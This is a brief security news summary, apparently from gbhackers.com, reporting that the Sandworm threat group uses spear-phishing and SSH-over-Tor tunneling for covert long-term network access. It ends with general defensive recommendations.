Sandworm, a state-sponsored threat group also known as FROZENBARENTS, has adopted a new technique involving SSH-over-Tor tunneling to maintain long-term, covert access to targeted networks. This development marks a significant evolution in their tradecraft, allowing them to remain undetected for extended periods. Sandworm has been active since 2014 and is known for targeting government bodies, energy firms, and research institutions, primarily for intelligence collection purposes.
The attack typically begins with spear-phishing, a common tactic used by threat actors to gain initial access to a network. Once inside, Sandworm employs SSH-over-Tor tunneling to establish a secure and anonymous communication channel. This method enables them to bypass traditional security measures and maintain persistence within the network without raising alarms.
SSH-over-Tor tunneling combines the secure shell (SSH) protocol with the anonymity network Tor. This combination provides a double layer of security and anonymity, making it challenging for defenders to detect and trace the malicious activity back to its source. By using this technique, Sandworm can effectively hide their presence and activities from network monitoring tools.
The impact of this new tactic is significant, as it allows Sandworm to conduct prolonged espionage operations without detection. Organizations in the targeted sectors face increased risks of data breaches and intelligence theft, which can have severe consequences for national security and business operations.
To counter this threat, organizations should enhance their network monitoring capabilities and implement advanced security measures. This includes deploying intrusion detection systems, conducting regular security audits, and training employees to recognize spear-phishing attempts. By taking these steps, organizations can better protect themselves against sophisticated threats like those posed by Sandworm.
Source: https://gbhackers.com/ssh-over-tor-tunnel/